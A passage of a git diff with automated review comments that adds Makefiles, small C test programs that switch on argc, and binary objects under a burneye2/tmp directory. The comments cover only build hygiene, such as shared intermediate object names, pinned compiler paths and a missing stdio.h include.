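+ ld -r -d -o 7350logout-final-dietlibc.o 7350logout.o $(LIBS_DIET)
+
+7350logout-final-glibc.o: 7350logout.c
+ $(CC) $(CFLAGS) -c -o 7350logout.o 7350logout.c
+ ld -r -d -o 7350logout-final-glibc.o 7350logout.o $(LIBS_GLIBC)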
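Review bot: Both object rules (lines 24-30) compile to the same intermediate `7350logout.o`, one with `$(DIET_INCLUDE)` and one without, so under `make -j` the `ld -r` step of one variant can pick up the object compiled for the other libc. Give each variant its own intermediate, e.g. `$(CC) $(DIET_INCLUDE) $(CFLAGS) -c -o 7350logout-diet.o 7350logout.c` with the matching name on the following `ld -r` line, and the same for glibc. The crt and libgcc paths are pinned to `/usr/lib/gcc-lib/i386-linux/2.95.4` while `CC=gcc` is unversioned; a comment naming the required compiler, or deriving the directory from `$(CC) -print-libgcc-file-name`, would keep the two from drifting apart. `all` and `7350logout` never produce files with those names, so a `.PHONY: all clean 7350logout` line would state that explicitly.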
diff --git a/other/burneye2/tmp/ssh-final-dietlibc.o b/other/burneye2/tmp/ssh-final-dietlibc.o
new file mode 100644
index 0000000..f5b118e
--- /dev/null
+++ b/other/burneye2/tmp/ssh-final-dietlibc.o
Binary files differ
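diff --git a/other/burneye2/tmp/switchtab/Makefile b/other/burneye2/tmp/switchtab/Makefile
new file mode 100644
index 0000000..c4224dd
--- /dev/null
+++ b/other/burneye2/tmp/switchtab/Makefile
@@ -0,0 +1,19 @@
+
+DFLAGS=
+CC=gcc-3.2
+LD=ld
+CFLAGS=$(DFLAGS) -Wall -O
+LIBS=-Lelf -lxelf -Lia32 -lia32
+
+all: switch
+
+clean:
+ rm -f switch.o
+
+switch: switch.c
+ $(CC) $(CFLAGS) -c -o switch.o switch.c
+# $(LD) -r -o switch-final.o switch.o \
+# /usr/lib/diet/lib-i386/libc.a \
+# /usr/lib/diet/lib-i386/start.o
+
+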
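Review bot: The `switch` rule on lines 13-14 writes `switch.o` and never a file named `switch`, so make considers the target out of date and recompiles on every run; naming the target after its output (`switch.o: switch.c` with `all: switch.o`) fixes that. `LIBS` is defined but no rule uses it, and with the link step commented out, a one-line comment saying that the relocatable object is the intended end product would tell the next reader this is deliberate. `switch_output.c`, added in the same directory by this commit, has no rule here, and `clean` removes only `switch.o`.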
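diff --git a/other/burneye2/tmp/switchtab/switch.c b/other/burneye2/tmp/switchtab/switch.c
new file mode 100644
index 0000000..c6b12f8
--- /dev/null
+++ b/other/burneye2/tmp/switchtab/switch.c
@@ -0,0 +1,39 @@
+
+#include <unistd.h>
+
+int
+main (int argc, char *argv[])
+{
+ int change;
+
+ switch (argc) {
+ case (0):
+ change = 0;
+ break;
+ case (1):
+ change = 7;
+ break;
+ case (3):
+ change = 12;
+ break;
+ case (4):
+ change = 49;
+ break;
+ case (5):
+ change = 18;
+ break;
+ case (6):
+ change = 4;
+ break;
+ case (7):
+ change = 13;
+ break;
+ default:
+ change = 0;
+ break;
+ }
+
+ return (change);
+}
+
+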
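Review bot: Nothing in the file records why the `switch (argc)` on line 9 skips `case (2)` and maps the remaining values to unrelated constants; given the `switchtab` directory this is presumably a deliberate fixture that makes the compiler emit a jump table with a hole, but as written it reads like an omission. A header comment along the lines of `/* test input: dense switch with a gap at 2, compiled to obtain a switch table */` would settle it, if that is the intent. `switch_output.c` in this commit carries the same switch and needs the same comment. `<unistd.h>` is included although nothing from it is used.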
diff --git a/other/burneye2/tmp/switchtab/switch.o b/other/burneye2/tmp/switchtab/switch.o
new file mode 100644
index 0000000..8fc5f92
--- /dev/null
+++ b/other/burneye2/tmp/switchtab/switch.o
Binary files differ
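diff --git a/other/burneye2/tmp/switchtab/switch_output.c b/other/burneye2/tmp/switchtab/switch_output.c
new file mode 100644
index 0000000..ef22580
--- /dev/null
+++ b/other/burneye2/tmp/switchtab/switch_output.c
@@ -0,0 +1,41 @@
+
+#include <unistd.h>
+
+int
+main (int argc, char *argv[])
+{
+ int change;
+
+ switch (argc) {
+ case (0):
+ change = 0;
+ break;
+ case (1):
+ change = 7;
+ break;
+ case (3):
+ change = 12;
+ break;
+ case (4):
+ change = 49;
+ break;
+ case (5):
+ change = 18;
+ break;
+ case (6):
+ change = 4;
+ break;
+ case (7):
+ change = 13;
+ break;
+ default:
+ change = 0;
+ break;
+ }
+
+ printf ("change: %d\n", change);
+
+ return (change);
+}
+
+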
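Review bot: `printf` is called on line 36 but the file includes only `<unistd.h>`, so the call goes through an implicit declaration of a variadic function. Older compilers accept this with a warning, while C99 and later treat it as invalid, and the object may stop building once the toolchain is updated. Add `#include <stdio.h>` next to the existing include; `<unistd.h>` itself is not used by anything in the file.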
diff --git a/other/burneye2/tmp/switchtab/switch_output.o b/other/burneye2/tmp/switchtab/switch_output.o
new file mode 100644
index 0000000..0e81959
--- /dev/null
+++ b/other/burneye2/tmp/switchtab/switch_output.o
Binary files differ